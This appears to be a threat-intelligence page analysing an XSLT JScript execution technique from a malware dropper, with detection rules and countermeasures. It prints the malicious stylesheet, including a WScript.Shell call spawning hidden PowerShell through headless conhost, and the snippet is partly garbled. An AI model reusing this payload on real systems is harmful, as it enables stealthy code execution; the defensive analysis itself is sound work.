XSLT JScript Extension Execution
A defense-evasion and execution technique in which a JScript/WScript carrier constructs an XSL stylesheet containing an msxsl:script block with language="JScript" and implements-prefix="u". The JScript function inside the CDATA block instantiates ActiveXObject("WScript.Shell") and calls .Run() to spawn a hidden PowerShell process. The XSLT is then loaded via MSXML2.XSLTemplate, applied to an empty MSXML2.DOMDocument, and executed through the JScript extension callback.
Pipeline
Stage 1 — XSL Stylesheet Construction
The carrier script builds the XSL stylesheet character-by-character using String.fromCharCode() to avoid string-literal detection:
<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:u="urn:5lCNtABZX3A">
<msxsl:script language="JScript" implements-prefix="u">
<;
s.Run("conhost.exe --headless powershell.exe -W H -nOP -nONI -Command \"&([scriptblock]::Create($env:sVS8A4njYXDu))\"",0,false);
return "";
}
]]>
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="u:v1()"/>
</xsl:template>
</xsl:stylesheet>
^[/intel/analyses/eba13078dea9e803b9120a45cd0dfad589f1defdf0f86fe84ae77fe63fff5300.html]
Stage 2 — MSXML COM Chain
The carrier instantiates four COM objects in sequence:
WScript.Shell— for environment variable staging and potential self-deletion.Msxml2.DOMDocument.6.0— empty XML document to serve as transform input.Msxml2.FreeThreadedDOMDocument.6.0— loads the XSL stylesheet; may call.setProperty()to disable external entity resolution or XSLT security features.Msxml2.XSLTemplate.6.0— compiles the stylesheet and creates a processor.
The processor is then invoked with .transform(), which triggers the JScript callback. ^[/intel/analyses/eba13078dea9e803b9120a45cd0dfad589f1defdf0f86fe63fff5300.html]
Detection Opportunities
- EDR: Flag
wscript.exeorcscript.exespawningconhost.exe --headlessfollowed bypowershell.exewith-W H -nOP -nONI. - Behavioral: Monitor
Msxml2.XSLTemplateinstantiation in processes whose parent iswscript.exe. - Sigma: Alert on
WScript.Shell.Runwhere the command line containsconhost.exe --headless powershell.exe. - Memory forensics: Look for XSL stylesheet fragments in process memory containing
msxsl:scriptandlanguage="JScript".
Defensive Countermeasures
- Disable the
MSXML2.XSLTemplateCOM object via AppLocker/CLSID restrictions if not needed for business applications. - Block
conhost.exe --headlessexecution from non-terminal parent processes. - Enable AMSI for JScript execution (the
msxsl:scriptblock is scanned by AMSI on Windows 10+).
Pages Where Observed
- unclassified-js-cjk-stego-dropper — entity page for the family using this technique
eba13078— full analysis ^[/intel/analyses/eba13078dea9e803b9120a45cd0dfad589f1defdf0f86fe84ae77fe63fff5300.html]
References
- MITRE ATT&CK T1059.007 — XSLT as a scripting language
- MSXML XSLT Extensions: https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms760218(v=vs.85)